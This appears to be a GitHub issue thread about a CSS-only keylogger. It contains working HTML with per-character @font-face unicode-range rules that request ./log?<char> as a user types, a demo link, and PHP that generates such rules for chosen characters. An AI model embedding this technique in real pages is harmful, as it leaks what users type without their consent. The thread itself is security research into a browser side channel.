CrookedStyleSheets icon indicating copy to clipboard operation
CrookedStyleSheets copied to clipboard

Published 20 hours ago verified publisher icon jbtronics

Keylogger using webfont with single character unicode-range

Open myfonj opened this issue 6 years ago • 4 comments

Sure, again just a single request per unique character during page visit could be sent, but besides that it seems to work as expected:

<!doctype html>
<title>css keylogger</title>
<style>
@font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
@font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
@font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
@font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
input { font-family: x, 'Comic sans ms'; }
</style>
<input value="a">type `bcd` and watch network log

myfonj avatar Feb 02 '18 19:02 myfonj

Why do you not make a pull request with these changes :D

julianYaman avatar Feb 02 '18 20:02 julianYaman

@myfonj briliant idia. Live demo - https://jsfiddle.net/hcbogdan/6hmm2z47/

Bogdaan avatar Feb 03 '18 09:02 Bogdaan

Very cool idea. Seems interesting. The problem is that we can only detect if a user types a char for the first time... But with word lists it should maybe possible to guess the text a user has typed (at least when it is only a single word...)

jbtronics avatar Feb 03 '18 11:02 jbtronics

I wrote some code at https://github.com/Bogdaan/spycss/blob/master/src/Interaction/Keylogger.php

Witch generates valid unicode-range: U+XXXX from alplabet.

For example:

// set alphabet
$logThisChars = 'abcdefgABCDEFG';

// create input field
echo $s->builder()
    ->tag('input')
    ->attribute('name', 'field')
    ->interactions([
        new Keylogger($logThisChars)
    ])
    ->get();

Bogdaan avatar Feb 03 '18 11:02 Bogdaan